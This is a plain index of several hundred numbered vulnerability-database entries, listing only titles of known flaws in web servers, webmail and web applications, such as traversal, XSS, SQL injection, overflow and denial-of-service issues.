[7797] 4D WebSTAR Symlink Local Privilege Escalation
[7796] 4D WebSTAR php.ini System Information Disclosure
[7795] 4D WebSTAR ShellExample.cgi Arbitrary Directory Browsing
[7794] 4D WebSTAR Pre-Authentication FTP Overflow
[7770] INweb Mail Server Connection Saturation DoS
[7725] BRS WebWeaver HTTP Server Double Dot Arbitrary File Access
[7717] Conexant Chipset Routers Port 254 Admin Interface Default Password
[7715] Way to the Web talkback.cgi article Parameter Traversal Arbitrary File Access
[7708] JavaServer Web Dev Kit Request Arbitrary File Access
[7706] ITAfrica WEBactive HTTP Server Traversal Arbitrary File Access
[7703] BiblioWeb Web Server Double Dot Traversal Arbitrary File Access
[7699] Free Java Web Server Double Dot Traversal Arbitrary File Access
[7698] HomeSeer Web Server Double Dot Traversal Arbitrary File Access
[7694] QNX Voyager Web Server Traversal Arbitrary File Access
[7681] WebSecure DFSWeb Configuration Utilities Unspecified
[7676] HP Secure Web Console Weak Encryption Issue
[7624] iPlanet Web Server Multiple GET Request DoS
[7540] OpenBSD Interface Media Configuration Arbitrary Modification
[7521] Mambo Open Source Web Links Protected Content Disclosure
[7518] Mambo Open Source Web Links Module Path Disclosure
[7478] Fastream NETFile Web Server Arbitrary File Manipulation
[7474] Open WebMail vacation.pl Arbitrary Command Execution
[7472] IBM WebSphere Edge Component Caching JunctionRewrite DoS
[7465] IBM Lotus Domino Web Access Message Handling DoS
[7463] Netegrity IdentityMinder Management Interface XSS
[7461] Webman I-Mall i-mall.cgi Arbitrary Command Execution
[7426] Mbedthis AppWeb VirtualHosts HTTPS Authorization Bypass
[7425] Mbedthis AppWeb User Message Denial Information Disclosure
[7391] Mbedthis AppWeb Mixed Case URL Authorization Bypass
[7390] Mbedthis AppWeb Crafted URL Scripting Code Disclosure
[7352] MHonArc Web Archive Mail Message XSS
[7338] ArGoSoft Mail Server Pro Web Mail XSS
[7320] HP-UX WebAdmin Object Action Manager
[7310] BEA WebLogic Upper Case Request JSP Source Disclosure
[7280] Cart32 c32web.exe GetLatestBuilds XSS
[7278] BEA WebLogic Role Interpretation Privilege Escalation
[7273] Infinity WEB Login Page Validation Bypass SQL Injection
[7223] PHP-Nuke Web_Links Module voteinclude.php Path Disclosure
[7214] SqWebMail print_header_uc Header XSS
[7189] NETGEAR FVS318 Web Administration Connection DoS
[7188] Cisco Linksys BEFSR41 Web Admin Connection DoS
[7187] Microsoft MN-500 Web Administration Multiple Connections DoS
[7185] Cisco Web Management CBOS Invalid Login Logging Failure
[7168] Microsoft Data Access Component Internet Publishing Provider WebDAV Security Zone Bypass
[7158] NETGEAR RP114 Web Safe Router WAN Port Scan DoS
[7102] Open Webmail IFS Environment Variable Privilege Escalation
[7101] Open WebMail openwebmail.pl Information Disclosure
[7100] Open WebMail openwebmail-shared.pl Session Parameter Arbitrary Code Execution
[7092] Webmatic Unspecified Login Function Access
[7086] Web Wiz Forums registration_rules.asp XSS
[7081] BEA WebLogic RMI Method Identity Theft
[7076] BEA WebLogic SSL Connection DoS
[7058] Apple Mac OS X CUPS Web Admin Utility DoS
[6996] Webmin Symlink Arbitrary File Overwrite Local Privilege Escalation
[6975] Bajie HTTP Web Server test Servlet Path Disclosure
[6970] Microsoft ISA Server 2000 Web Publishing Unencrypted Credentials Disclosure
[6933] 602Pro LAN SUITE Web Mail index.html XSS
[6932] 602Pro LAN SUITE Web Mail Arbitrary Directory Listing
[6786] talentsoft Web+ HTTP Cookie Overflow
[6785] talentsoft Web+ webplus.dll Long WML Remote Overflow
[6784] talentsoft Web+ webplus.exe Long WML Remote Overflow
[6783] talentsoft Web+ webpsvc.exe Long URL Remote Overflow
[6782] talentsoft Web+ Unspecified ODBC Connection Issue
[6781] talentsoft Web+ Unspecified DBInsert BLOB
[6780] talentsoft Web+ Unspecified Docroot Script Issue
[6779] talentsoft Web+ Log File Information Disclosure
[6778] talentsoft Web+ About Page Server Information Disclosure
[6777] talentsoft Web+ File Creation Group Ownership Issue
[6776] talentsoft Web+ webping.wml Example Application Arbitrary File Access
[6775] talentsoft Web+ ::$DATA Stream Request WML Source Disclosure
[6774] talentsoft Web+ Error Page Path Disclosure
[6773] talentsoft Web+ URL Append WML File Source Disclosure
[6772] Xerver Free Web Server Crafted C:/ Request Remote DoS
[6771] Xerver Free Web Server Arbitrary Directory Listing
[6768] IBM Tivoli Management Framework ManagedNode Web Server GET Request Remote Overflow
[6767] IBM Tivoli Management Framework Endpoint Web Server GET Request Remote Overflow
[6764] WebStore WSSecurity.pl Traversal Authentication Bypass
[6763] WebStore ws_mail.cgi Kill Parameter Arbitrary Command Executions
[6754] Symantec Web Security Block Page XSS
[6749] Microsoft Crystal Reports Web Viewer crystalimagehandler.aspx Arbitrary File Access
[6746] SurgeMail/WebMail Login Form XSS
[6745] SurgeMail/WebMail Error Message Path Disclosure
[6730] Webmin Arbitrary Module Configuration Information Disclosure
[6729] Webmin Arbitrary Account Lock DoS
[6725] WebzEdit done.jsp message Parameter XSS
[6697] WebGUI wobject Arbitrary Information Disclosure
[6696] WebGUI Unspecified Obscure Security Issue
[6694] Apple Mac OS X Find-By-Content .DS_Store Web Directory Listing
[6683] webfs Remote Request-URI Overflow
[6673] WebGUI Unspecified Arbitrary Command Execution
[6666] HP Instant TopTools GoAhead WebServer hpnst.exe System DoS
[6665] Orange Web Server Malformed HTTP Request Remote DoS
[6664] GoAhead WebServer /aux Directory Request Parsing Remote DoS
[6662] GoAhead WebServer Error Page XSS
[6660] MyWebServer GET Request Remote Overflow DoS
[6659] MyWebServer Long URL Error Page XSS
[6654] Open WebMail openwebmail-abook.pl Session Parameter Arbitrary Code Execution
[6632] Allaire JRun web.xml Directory Listing
[6620] Caucho Resin WEB-INF Encoded Request Information Disclosure
[6594] Linux Kernel iproute Netlink Interface Spoofed Message Local DoS
[6549] iWeb Server Double Dot Traversal Arbitrary File Access
[6548] iWeb Server 2 Hex Encoded Arbitrary File Access
[6547] VisNetic WebSite fcount.exe Server Path Disclosure
[6544] SLWebMail ShowGodLog.dll Arbitrary File Access
[6518] TinyWEB cgi-bin Crafted HTTP GET Request DoS
[6517] TinyWEB cgi-bin Arbitrary File/Directory Access
[6470] WebTrends Unrestricted File Credentials Disclosure
[6463] WebStore web_store.cgi Information Disclosure
[6461] Lysias Lidik Web Server Traversal Arbitrary Directory Listing
[6445] WildTangent Web Driver Filename Overflow
[6344] TTT-C Edit Panel Script Webmaster Email Parameter XSS
[6343] TTT-C Edit Panel Script Webmaster ICQ Parameter XSS
[6334] ICQ99 ICQ Web Server Active Homepage File Existence Disclosure
[6330] XEROX DocuColor Web Server URL DoS
[6296] Kerio MailServer Web Mail Module XSS
[6235] Secure Computing Sidewinder G2 Firewall Admin Interface Private Key Export
[6230] PHP-Nuke Web_Links Module Multiple Parameter SQL Injection
[6223] PHP-Nuke Web_Links Module Full Path Disclosure
[6202] Third Voice Web annotation Utility XSS
[6157] WebTrends HTTP Server Encoded Space Request Source Code Disclosure
[6146] Trend Micro InterScan WebManager HttpSave.dll Overflow
[6145] Trend Micro InterScan VirusWall/WebManager RegGo.dll Overflow
[6140] Trend Micro Virus Buster cgiWebupdate.exe Arbitrary File Access
[6121] Microsoft Outlook Express BASE HREF Web Content Loading
[6119] Solaris SMC Web Server File Enumeration
[6077] BEA WebLogic Unprivileged Stop/Start
[6076] BEA WebLogic weblogic.xml Permission Reversion Weakness
[6020] Nokia Voyager Web Admin Server Long URL Overflow
[6016] Webcom Guestbook rguest.exe Arbitrary File Access
[6015] Webcom Guestbook wguest.exe Arbitrary File Access
[5983] MyWeb HTTP GET Request Overflow DoS
[5962] Fortinet FortiOS (FortiGate) Firewall Web Filter Log XSS
[5926] Squid Web Proxy Cache Authentication Header Forwarding Information Disclosure
[5925] Squid Web Proxy Cache msnt_auth Remote Overflow
[5881] Aldo's Web Server (aweb) Traversal Arbitrary File Access
[5880] AWeb Physical Path Disclosure
[5862] Java Web Server Crafted Request CGI Source Disclosure
[5823] Allaire Spectra Administration Interface Configuration Access
[5798] HP Web JetAdmin ExecuteFile Command Execution
[5797] HP Web JetAdmin cache.ini Arbitrary File Write
[5796] HP Web JetAdmin obj Parameter XSS
[5795] HP Web JetAdmin Framework:CheckPassword Authentication Bypass
[5794] HP Web JetAdmin Encrypted Password DoS
[5793] HP Web JetAdmin Weak Encryption
[5792] HP Web JetAdmin framework.ini Password Disclosure
[5791] HP Web JetAdmin framework.ini Path Disclosure
[5790] HP Web JetAdmin Trailing . Request Script Source Disclosure
[5779] Jana Web Server Hex Encoded Arbitrary File Access
[5778] Jana Web Server Arbitrary File Access
[5777] Pi3Web CGI Handler Long Parameter Handling Overflow
[5752] Web Wiz Forums pop_up_ip_blocking.asp laryCheckedIPAddrID Parameter SQL Injection
[5751] Web Wiz Forums pop_up_ip_blocking.asp Arbitrary IP Blocking
[5750] Web Wiz Forums pop_up_topic_admin.asp Unauthenticated Title Modification
[5737] BEA WebLogic Crafted GET Request Hostname Disclosure
[5704] iPlanet Web Server Enterprise Edition URL-encoded Host: Information Disclosure
[5702] DiGi Web Server GET Request Handling Remote DoS
[5669] Deerfield Website Pro Remote Manager DoS
[5648] Multiple Web Server Dangerous HTTP Method TRACK
[5647] Multiple Web Server Dangerous HTTP Method MOVE
[5646] Multiple Web Server Dangerous HTTP Method DELETE
[5633] Microsoft IIS Invalid WebDAV Request DoS
[5629] PostNuke Web_Links Module query Parameter XSS
[5606] Microsoft IIS WebDAV PROPFIND Request DoS
[5599] Viking Web Server Hexadecimal Encoded Arbitrary File Access
[5571] BEA WebLogic config.sh Log File Admin Credential Cleartext Disclosure
[5570] BEA WebLogic URL Restriction Bypass Information Disclosure
[5569] BEA WebLogic Unauthorized Enterprise JavaBean Object Deletion
[5557] Microsoft Outlook Web Access With IE Embedded Script Execution
[5554] Guardian Digital WebTool Inherited Variable Privilege Escalation
[5553] Sybex E-Trainer Web Server Traversal Arbitrary File Access
[5548] Fastream NETFile FTP/Web Server Invalid Login DoS
[5534] Oracle Application Server Web Cache HTTP Request Overflow
[5523] MyWebServer searchTarget Command Execution
[5515] PostNuke Web_Links Module Path Disclosure
[5507] PostNuke Web_Links Module index.php ttitle Parameter XSS
[5492] IBM WebSphere Application Server (WAS) Predictable Session Cookies
[5488] NS WebMail Unspecified Security Flaw
[5485] SMB Web Client -U Parameter Unspecified Issue
[5471] WebCalendar Unspecified Remote Command Execution
[5373] Funsoft Dinos Webserver Execute Arbitrary Commands
[5371] MDG Computer Services Web Server 4D (WS4D) Cleartext Password Storage
[5370] MDG Computer Services Web Server 4D (WS4D)/eCommerce HTTP Request Overflow DoS
[5342] Microsoft IE Malformed Web Page Zone Spoofing
[5339] HP AdvanceStack Hub Web Config Utility web_access.html Authentication Bypass
[5335] Netwin WebNews Webnews.exe Remote Overflow
[5325] Novell NetWare Web Server sewse.nlm (viewcode.jse) Traversal Arbitrary File Access
[5324] Nombas ScriptEase Mini WebServer comment2.jse Traversal Arbitrary File Access
[5299] BEA WebLogic Deleted Group Privilege Escalation
[5298] BEA WebLogic 2-way SSL User / Server Impersonation
[5297] BEA WebLogic config.xml Password Exposure
[5296] BEA WebLogic Internal Method Boot Credential Disclosure
[5281] Instant Web Mail write.php Mail Header Modification
[5280] Instant Web Mail message.php Execute Arbitrary POP3 Command
[5279] WebSight Directory System New Link XSS
[5278] Apache Tomcat web.xml Restriction Bypass
[5270] EMU Webmail HTTP Host Header Execute Arbitrary Program
[5243] Ipswitch IMail Express Web Messaging Buffer Overflow
[5237] Abyss Web Server Encoded Traversal Arbitrary File Access
[5166] Zope Through The Web Code Header Injection DoS
[5161] EMUMAIL EMU Webmail emumail.cgi Traversal Arbitrary File Access
[5119] LabVIEW Web Server HTTP Get Newline DoS
[5059] NetScreen ScreenOS WebUI Long Username DoS
[5055] LocalWEB2000 Crafted Request Access Restriction Bypass
[5026] KeyFocus (KF) Web Server Null Character (%00) Request Restricted File / Directory Access
[5025] BEA WebLogic Server and Express Performance Pack Race Condition DoS
[5009] Kerio Personal Firewall Web Filtering URL Handling DoS
[5006] Open Webmail syshomedir Variable Arbitrary Directory Creation
[4990] Ipswitch IMail Web Messaging HTTP GET Request Handling Remote Overflow
[4972] EMUMAIL Webmail Login Multiple Parameter XSS
[4970] Pi3Web Error Message Path Disclosure
[4965] FTGatePro Web Mail message.fts Path Disclosure
[4964] FTGatePro Web Mail individual.fts Display Name Field XSS
[4963] FTGatePro Web Mail index.fts folder Parameter XSS
[4961] F-Secure BackWeb Privilege Escalation
[4952] Novell NetWare Enterprise Web Server Information Disclosure
[4950] Novell NetWare Enterprise Web Server nsn Module XSS
[4949] Novell NetWare Enterprise Web Server webacc Multiple Parameter XSS
[4940] SafeWeb File Size Fingerprinting
[4937] eMule IRC Module / Web Server DecodeBase16 Function Remote Overflow
[4936] MaxWebPortal password.asp Password Reset
[4935] MaxWebPortal Default Database Access
[4934] MaxWebPortal Cookie Poisoning Account Compromise
[4933] MaxWebPortal Start New Topic Hidden Form Field Modification
[4932] Microsoft Outlook Web Access SecurID Authentication Bypass
[4931] iisPROTECT Admin Interface SiteAdmin.ASP GroupName Parameter SQL Injection
[4922] BEA WebLogic SSL Certificate Chain User Impersonation
[4915] Microsoft Content Management Server (MCMS) Web Authoring Command File Upload Arbitrary Code Execution
[4851] BRS WebWeaver HTTP POST/HEAD Request Overflow
[4808] Axis Network Camera Webserver File Creation
[4807] Axis Network Camera Webserver File Overwrite
[4806] Axis 2400 Network Camera Webserver Message Log Disclosure
[4805] Axis Network Camera Webserver DoS
[4765] Zeus Technologies Zeus Web Server vs_diag.cgi server Parameter XSS
[4741] McAfee WebShield Malformed Outgoing SMTP Recipient Remote DoS
[4740] McAfee WebShield SMTP Filter Bypass
[4739] McAfee WebShield SMTP MIME Attachments Bypass
[4738] McAfee WebShield Attachment Content Filter Bypass
[4669] WebCT Campus Edition @import URL Function XSS
[4629] Jigsaw Webserver DOS device DoS
[4628] Jigsaw Webserver Path Disclosure
[4626] Microsoft DirectX Files Viewer xweb.ocx Overflow
[4599] Web Wiz Forums Multiple pm_buddy_list.asp XSS
[4598] Web Wiz Forums members.asp XSS
[4588] Pi3 Web Server Overflow
[4560] HP Web JetAdmin HTS File Upload
[4559] HP Web JetAdmin setinfo.hts setinclude Parameter Traversal Arbitrary Command Execution
[4558] HP Web JetAdmin (hpwebjetd) Malformed Request DoS
[4467] Microsoft Windows WebDav ntdll.dll Remote Overflow
[4460] XWeb URL Traversal Arbitrary File Download
[4404] WatchGuard Firebox SOHO Web Config Server Unauthenticated Access Bypass
[4399] Max Web Portal Arbitrary Password Reset
[4398] Max Web Portal Database Exposure
[4397] Max Web Portal search.asp Search Parameter XSS
[4396] Max Web Portal Cookie Poisoning
[4395] Max Web Portal Hidden Field Modification
[4367] Symantec Firewall Secure Webserver Timeout DoS
[4323] noweb Multiple Script Insecure Temporary File Creation
[4306] IBM Lotus Domino Server webadmin.nsf Quick Console XSS
[4301] NetWin WebNEWS CGI Backdoor Passwords
[4255] Pegasi Web Server Error Page XSS
[4254] Pegasi Web Server Arbitrary File Access
[4253] Novell GroupWise WebAccess Insecure Default Configuration
[4249] Oracle Web Cache Unspecified Client Request Handling
[4230] CFWebstore index.cfm URL XSS
[4229] CFWebstore index.cfm Multiple Parameter SQL Injection
[4221] Open Webmail oom Script Privilege Escalation
[4204] EMUMAIL Webmail emumail.fcgi Multiple Parameter XSS
[4203] EMUMAIL Webmail init.emu Information Disclosure
[4201] Open WebMail userstat.pl Arbitrary Command Execution
[4191] KorWebLog Arbitrary File Retrieval
[4155] PWebServer URL Traversal Arbitrary File Access
[4139] Cisco Content Services Switch 11000 Series WebNS DoS
[4137] DAWKCo POP3 Server with WebMAIL Extension Session
[4136] GWeb HTTP Server Arbitrary File Access
[4113] IA WebMail Server Username Overflow
[4112] IA WebMail Server DoS
[4111] IA WebMail Server XSS
[4110] IA WebMail Server User Impersonation
[4107] 602Pro LAN SUITE Web Mail Login Form Installation Path Disclosure
[4097] EFTP Web Portal Unspecified Admin Privileges
[4095] EFTP eftp3users.dat Web Admin Password Stored in Cleartext
[4077] Dell OpenManage Web Server HTTP POST Remote Overflow
[3996] webfs Directory Creation Pathname Handling Remote Overflow
[3995] Webstores 2000 browse_items.asp Search_Text Parameter SQL Injection
[3994] Webstores 2000 error.asp XSS
[3989] Vizer Web Server Multiple Method Malformed Request DoS
[3985] APC SmartSlot Web/SNMP Management Card Default Password
[3968] Microsoft FrontPage Personal Web Server Arbitrary File Access
[3960] phpWebSite index.php SQL Injection
[3959] Minihttp Forum Web Server Arbitrary File Access
[3958] Minihttp Forum Web Server Multiple Field XSS
[3929] PHP-Nuke Web_Links Module admin Parameter SQL Injection
[3910] MaxWebPortal dl_showall.asp sub_name Parameter XSS
[3909] MaxWebPortal down.asp HTTP_REFERER XSS
[3908] MaxWebPortal Personal Messages SendTo Parameter SQL Injection
[3907] MaxWebPortal register Avatar File Name XSS
[3869] Webalizer Reverse DNS Lookup Overflow
[3868] Webalizer HTTP Referrer Embedded Search Keywords XSS
[3854] SkunkWEB handler.py XSS
[3853] phpWebSite RSS Feeds Multiple Unspecified Issues
[3852] phpWebSite announce Module ANN_id SQL Injection
[3850] phpWebSite article.php sid Parameter XSS
[3849] phpWebSite Multiple Instance Administrative Privilege
[3848] phpWebSite modsecurity.php inc_prefix Parameter Remote File Inclusion
[3847] phpWebSite search Module PDA_limit Parameter XSS
[3846] phpWebSite pagemaster Module PAGE_id Parameter XSS
[3845] phpWebSite fatcat Module fatcat_id Parameter XSS
[3844] phpWebSite Calendar Module DoS
[3843] phpWebSite Calendar Module Path Disclosure
[3842] phpWebSite calendar Module day Parameter XSS
[3803] Web Crossing Content-Length Header DoS
[3793] Leif Wright Web Blog blog.cgi ViewFile Request file Parameter Arbitrary Command Execution
[3778] Analog Form Interface Remote Arbitrary File Read
[3749] DotNetNuke Web.config SQL Server Auth Credential Disclosure
[3739] Leif Wright Web Blog Directory Traversal
[3728] BEA WebLogic Boot Credentials Disclosure
[3727] BEA WebLogic config.xml Cleartext Administrative Password Disclosure
[3726] BEA WebLogic HTTP TRACE Response XSS
[3725] BEA WebLogic ServerStartMBean.Password Password Disclosure
[3724] BEA WebLogic Web Services Fat Client Incorrect Identity Privilege Escalation
[3722] Novell NetWare Enterprise Web Server lcgitest.nlm Information Disclosure
[3721] Novell NetWare Enterprise Web Server SnoopServlet Information Disclosure
[3720] Novell NetWare Enterprise Web Server snoop.jsp Information Disclosure
[3717] Perl on Novell NetWare Web Handler Crafted POST Request Arbitrary Perl Code Execution
[3715] Novell NetWare Enterprise Web Server env.bas Information Disclosure
[3714] Novell NetWare Enterprise Web Server CGI2PERL Module XSS
[3707] Cherokee Web Server Error Page XSS
[3695] Mbedthis AppWeb DOS Device Request Remote DoS
[3694] GoAhead WebServer GET Request Traversal Arbitrary File Access
[3680] WebTrends viewreport.pl profileid Variable Path Disclosure
[3663] aldweb miniPortail lng Path Disclosure
[3643] WebCalendar view_w.php eventinfo SQL Injection
[3642] WebCalendar view_v.php eventinfo SQL Injection
[3641] WebCalendar view_t.php eventinfo SQL Injection
[3640] WebCalendar view_m.php eventinfo SQL Injection
[3639] WebCalendar view_l.php eventinfo SQL Injection
[3638] WebCalendar week_details.php eventinfo SQL Injection
[3637] WebCalendar month.php eventinfo SQL Injection
[3636] WebCalendar day.php eventinfo SQL Injection
[3635] WebCalendar colors.php color SQL Injection
[3634] WebCalendar week.php user SQL Injection
[3633] WebCalendar week.php user XSS
[3632] WebCalendar colors.php color XSS
[3631] WebCalendar view_w.php eventinfo XSS
[3630] WebCalendar view_v.php eventinfo XSS
[3629] WebCalendar view_t.php eventinfo XSS
[3627] WebCalendar view_m.php eventinfo XSS
[3625] WebCalendar view_l.php eventinfo XSS
[3624] WebCalendar week_details.php eventinfo XSS
[3623] WebCalendar month.php eventinfo XSS
[3617] GoAhead WebServer Malformed Content-Length Header Remote DoS
[3610] GetWare Multiple Products Integrated WebServer Malformed Content-Length DoS
[3559] RealNetworks Helix Administrative Interface HTTP POST Request DoS
[3550] WebScripts WebBBS Guestbook XSS
[3549] WebBBS Pro DOS Device Name DoS
[3548] International TeleCommunications WebBBS New User Overflow
[3547] International TeleCommunications WebBBS Search DoS
[3546] Extropia WebBBS bbs_forum.cgi read Parameter Traversal Remote Command Execution
[3545] International TeleCommunications WebBBS File Name Overflow
[3544] International TeleCommunications WebBBS GET Request Overflow
[3543] WebScripts WebBBS Message SSI
[3542] WebScripts WebBBS Unspecified Delete Function
[3541] WebScripts WebBBS Unspecified Potential Delete Function
[3540] WebScripts WebBBS Unspecified delete message Profile-based
[3513] WebScripts WebBBS webbbs_config.pl Remote Command Execution
[3494] SurfControl SuperScout Web Filter SQL Injection
[3493] SurfControl SuperScout Web Filter Arbitrary File Access
[3492] SurfControl SuperScout Web Filter GET Request DoS
[3491] SurfControl SuperScout Web Filter Weak Encryption
[3489] SurfControl SuperScout Web Filter User Accounts Information Disclosure
[3473] PhpGedView gdbi_interface.php pid Parameter XSS
[3459] Symantec Web Security Error Page XSS
[3445] DansGuardian Webmin Module edit.cgi Arbitrary File Access
[3427] Sun ONE Web Server on HP-UX Unspecified Overflow
[3426] BEA WebLogic JVM DoS
[3425] BEA WebLogic Password Exposure Weakness
[3417] BEA WebLogic InteractiveQuery.jsp XSS
[3416] Novell GroupWise GWWEB.EXE HELP Web Server Path Disclosure
[3415] Novell GroupWise GWWEB.EXE/GWINTER.NLM Overflow
[3414] Novell GroupWise GWWEB.EXE HTMLVER Web Server Path Disclosure
[3413] Novell GroupWise GWWEB.EXE HELP Parameter Traversal Arbitrary File Access
[3375] Abyss Web Server Administration Console Authentication Bypass
[3359] Easy File Sharing Web Server Forum Malformed Title Field DoS
[3358] Easy File Sharing Web Server users.sdb Local Cleartext Password Disclosure
[3355] Easy File Sharing Web Server msg.ghp Multiple Parameter Traversal Arbitrary File Access
[3352] Easy File Sharing Web Server Traversal Arbitrary File / Directory Access
[3306] Cherokee Web Server Malformed POST Request Remote DoS
[3304] miniBB bb_func_usernfo.php Website Name Field XSS
[3296] Fortinet FortiOS (FortiGate) Firewall selector Admin Interface XSS
[3295] Fortinet FortiOS (FortiGate) Firewall listdel Admin Interface XSS
[3294] Fortinet FortiOS (FortiGate) Firewall Policy Admin Interface XSS
[3289] Fortinet FortiOS (FortiGate) Firewall dlg Admin Interface XSS
[3288] Abyss Web Server Multiple slash Arbitrary Directory Listing
[3287] Abyss Web Server Crafted Filename Request Authentication Bypass
[3286] Abyss Web Server Character Append Arbitrary File Disclosure
[3285] Abyss Web Server Traversal Arbitrary File Access
[3281] MaxWebPortal search.asp Search Parameter XSS
[3243] CA Unicenter RC Help Interface Privilege Escalation
[3235] iPlanet Web Publisher Remote Overflow
[3233] Multiple Web Server Default Page Fingerprinting Weakness
[3214] Active Webcam Traversal Arbitrary File Access
[3138] Active WebCam Error Page XSS
[3093] Potentially Dangerous Web Document Found
[3092] Interesting Web Document Found
[3088] Web Art Factory CMS Unspecified User Authentication
[3083] SAP DB Web Agent Administration Unauthorized Access
[3082] SAP DB Web-Tools "
[3080] SAP DB niserver Interface Overflow
[3078] Cisco PIX VPNC External Interface IKE Phase 1 Packet Remote DoS
[3064] BEA WebLogic MBeanHome Config Information Disclosure
[3063] BEA WebLogic Node Manager DoS
[3062] BEA WebLogic JMS Provider Cleartext Password
[3061] BEA WebLogic T3S Protocol Information Disclosure
[3051] Microsoft IE MHT Web Archive Overflow
[3049] Microsoft IE ftp.htt FTP Web View URL XSS
[3035] Microsoft WebBrowser Control t:video File Execution
[3020] Cyclonic WebMail Email Spoofing
[3005] Microsoft IE WebBrowser Control dialogArguments XSS
[2946] Web Wiz Forums forum_members.asp XSS
[2936] phpWebFileManager Invalid Extension File Manipulation
[2926] Abyss Web Server Directory Protection Bypass
[2922] Webgate Web Eye Exposure of Users and Passwords
[2901] Websense Blocked Site XSS
[2899] GnuPG HTTP Keyserver Protocol Interface Format String
[2891] Sun ONE Web Server Unspecified DoS
[2876] Macromedia JRun JMC Interface XSS
[2833] SAP DB Web Database Manager Predictable Session IDs
[2831] Sun ONE Web Server Log Entry Manipulation
[2830] NetServe Web Server Directory Traversal and Admin Password Disclosure
[2829] phpWebFileManager index.php f Parameter Traversal Arbitrary File Access
[2814] WebWasher Proxy Port Error Message XSS
[2813] Web Wiz Forums XSS
[2810] BEA WebLogic Proxy Plugin DoS
[2793] TelCondex tc.SimpleWebServer Directory Traversal
[2768] Web Wiz Forums Unauthorized Message Access
[2764] Plug and Play Web Server Proxy Service HTTP Request Handling DoS
[2757] IA WebMail Server GET Request Overflow
[2747] Compaq Insight Manager Web Agent Unspecified DoS
[2738] Simple Web Server (SWS) Referer Header Overflow
[2732] Fastream NETFile FTP/WebServer 404 Error Page XSS
[2723] FirstClass /Search Web Root Remote Information Disclosure
[2719] WebTide Encoded JSP File HTTP Request Arbitrary Directory Access
[2689] Bajie HTTP Web Server Multiple XSS
[2679] Microsoft Outlook Web Access XSS
[2653] Alt-N WebAdmin WebAdmin.dll Overflow
[2632] MPWeb PRO Arbitrary File Access
[2619] webfs Arbitrary File and Directory Access
[2610] Savant Web Server Infinite Loop DoS
[2604] BRS WebWeaver IP Logging Bypass
[2597] EnGarde WebTool-userpass Exposes Passwords
[2554] Forum Web Server Login Bypass
[2552] Easy File Sharing Web Server newmsg.ghp Your Message Field XSS
[2549] Bandwebsite admin.php Direct Request Arbitrary Account Creation
[2542] 4D WebSTAR FTP Password Parameter Remote Overflow
[2531] WebX Arbitrary File Access
[2521] ICQ Web Front XSS
[2512] WebCalendar day.php eventinfo XSS
[2496] Web Wiz Journal Database Content Disclosure
[2494] Web Wiz Internet Search Engine Database Content
[2493] Web Wiz Polls Database Content Disclosure
[2492] Web Wiz Guestbook WWGguestbook.mdb Direct Request Database Disclosure
[2491] Web Wiz Mailing Database Content Disclosure
[2484] BEA WebLogic Integration - Business Connect Access to
[2481] aldweb miniPortail lng Parameter XSS
[2465] DWebPro http.ini Cleartext Authentication Credential Disclosure
[2457] oMail-webmail omail.pl checklogin Function Multiple Field Arbitrary Command Execution
[2444] WebFtp accounts.dat Authentication Credential Cleartext Disclosure
[2433] WebiToome WebiToome_Prefs Account Credential Cleartext Disclosure
[2425] Sun ONE Web Server Unspecified DoS
[2410] phpWebSite Multiple Calendar Module SQL Injection
[2401] Webware for Python Cookie Object Arbitrary Code Execution
[2391] SkunkWEB Cache.py Arbitrary File Access
[2372] bj Http Web Server config/users.properties Authentication Credential Cleartext Disclosure
[2345] BEA WebLogic Server JNDI Initial Contexts Privilege Escalation
[2310] Novell NetWare Web Server CGI2PERL.NLM PERL Handler Remote Overflow
[2234] VisNetic WebSite Path Disclosure
[2226] Abyss Web Server Malformed GET Header Remote DoS
[2207] Alt-N WebAdmin USER Remote Overflow
[2201] iWeb Server Directory Traversal
[2195] VisNetic WebMail PHP Source Disclosure
[2194] Armida Databased Web Server 1.0 DoS
[2164] Plug and Play Web Server Arbitrary File/Directory Access
[2125] BEA WebLogic/Liquid Data XSS
[2117] Multiple Web Server Default Welcome Page Fingerprinting Weakness
[2110] Web Server Name Disclosure
[2100] Microsoft Windows RPC DCOM Interface Overflow
[2096] Microsoft ISA Server SurfControl Web Filter
[2092] IBM WebSphere HTTP Request Header Remote Overflow
[2091] NucaWeb Server Arbitrary File Access
[2090] IBM WebSphere Caching Proxy DoS
[2089] IBM Tivoli SecureWay WebSEAL Proxy Policy Director Encoded URL DoS
[2087] Mountain Network Systems webcart.cgi NEXTPAGE Parameter Arbitrary Command Execution
[2020] Cacheflow CacheOS Web Administration Arbitrary Cached Page Code Leakage
[1979] IBM Lotus Domino Web Server webadmin.ntf ReplicaID Request Web Administrator Access
[1921] Roxen Web Server URL Rectifier Module Arbitrary File Access
[1908] IBM Tivoli SecureWay WebSEAL Proxy Policy Director Encoded Traversal Arbitrary File Access
[1848] Cisco CSS Web Management Authentication Bypass
[1844] Webmin miniserv.pl Environment Variable Cleartext Password Local Disclosure
[1817] Jana Web Server MS-DOS Device Name Request Parsing Remote DoS
[1807] SAP Web Application Server for Linux Arbitrary Command Execution
[1802] Perl Web Server Arbitrary File Read
[1799] WebXQ Server Arbitrary File Access
[1798] Viking Web Server Traversal Arbitrary File Access
[1789] Microsoft ISA Server Web Proxy Malformed HTTP Request Parsing Remote DoS
[1775] O'Reilly Website Professional Malformed Request Path Disclosure
[1770] Microsoft IIS WebDAV Malformed PROPFIND Request Remote DoS
[1724] Microsoft Web Client Extender NTLM Credential Disclosure
[1707] NetScreen Firewall WebUI URL Handling Remote Overflow DoS
[1706] IBM HTTP Server AfpaCache/WebSphereNet.Data user-agent Header Handling Remote DoS
[1657] 602Pro LAN SUITE webprox.dll GET Request Overflow
[1649] PeleSoft NetSnap Web Server GET Request Overflow
[1626] Samba Web Administration Tool (SWAT) cgi.log Permission Weakness Information Disclosure
[1625] Samba Web Administration Tool (SWAT) Failed Login Logging Failure Weakness
[1619] 4D WebSTAR GET Overflow DoS
[1606] Microsoft IE Cached Web Credentials Disclosure
[1561] IBM WebSphere Application Server (WAS) Host: Request Header Overflow
[1553] Microsoft WebTV annclist.exe Malformed UDP Packet Parsing Remote DoS
[1541] Gordano NTMail Web Configuration Server Partial HTTP Request DoS
[1509] BEA WebLogic Proxy Multiple Overflows
[1483] BEA WebLogic JSPServlet Remote Code Execution
[1481] BEA WebLogic FileServlet Source Code Disclosure
[1480] BEA WebLogic SSIServlet Invocation Source Code Disclosure
[1474] IBM WebSphere InvokerServlet Source Code Disclosure
[1470] L-Soft LISTSERV Web Archives Long QUERY_STRING Overflow
[1463] WEBactive HTTP Server GET Request Overflow
[1456] Savant Web Server GET Request Remote Overflow
[1443] Oracle Web Listener for AIX Malformed URL DoS
